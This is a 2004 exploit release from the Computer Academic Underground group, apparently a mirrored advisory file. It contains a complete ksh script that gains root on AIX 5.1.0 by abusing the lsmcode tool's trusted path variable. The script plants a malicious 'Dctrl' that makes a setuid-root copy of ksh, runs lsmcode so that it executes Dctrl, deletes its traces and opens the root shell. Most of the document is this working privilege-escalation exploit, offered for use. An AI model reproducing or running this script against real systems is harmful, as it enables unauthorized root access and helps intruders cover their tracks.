____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground http://www.caughq.org Exploit Code ===============/======================================================== Exploit ID: CAU-EX-2004-0006 Release Date: 2004.12.23 Title: lsmcode-suidshell.sh Description: lsmcode Trusted $PATH SUID Shell Creation Tested: lsmcode on AIX 5.1.0 Attributes: Privileged Access Exploit URL: http://www.caughq.org/exploits/CAU-EX-2004-0006.txt Author/Email: I)ruid ===============/======================================================== Description =========== This script exploit writes out a simple shell script named 'Dctrl' which copies ksh, sets ownership to root, and sets the suit bit on it, thus creating a suid shell. The exploit then executes 'lsmcode' which executes our malicious 'Dctrl' without dropping privileges via a modified $PATH environment variable. Afterward it cleans up it's mess and executes the suid shell for convenience. Notes ===== This exploit is written assuming your target shell is ksh. Credits ======= cees-bart , phd student @ university of nijmegen References ========== http://www.securityfocus.com/archive/1/384918/2004-12-20/2004-12-26/0 http://www.securityfocus.com/archive/1/385052/2004-12-20/2004-12-26/0 Exploit ======= #!/usr/bin/ksh # # lsmcode-suidshell.sh - I)ruid [CAU] (12.2004) # # Exploits AIX's lsmcode tool which does not drop privs prior to # executing 'Dctrl' via trusted $PATH environment variable. # echo "Creating malicious 'Dctrl'" mkdir ./bin cat > ./bin/Dctrl << __EOF__ #!/usr/bin/ksh cp /usr/bin/ksh ./ksh chown root:root ./ksh chmod 4755 ./ksh __EOF__ chmod 700 ./bin/Dctrl echo "Setting up malicious environment" export DIAGNOSTICS=. echo "Executing /usr/sbin/lsmcode" /usr/sbin/lsmcode echo "Cleaning up our mess..." rm -r ./bin export DIAGNOSTICS= echo "Executing suid shell:" ./ksh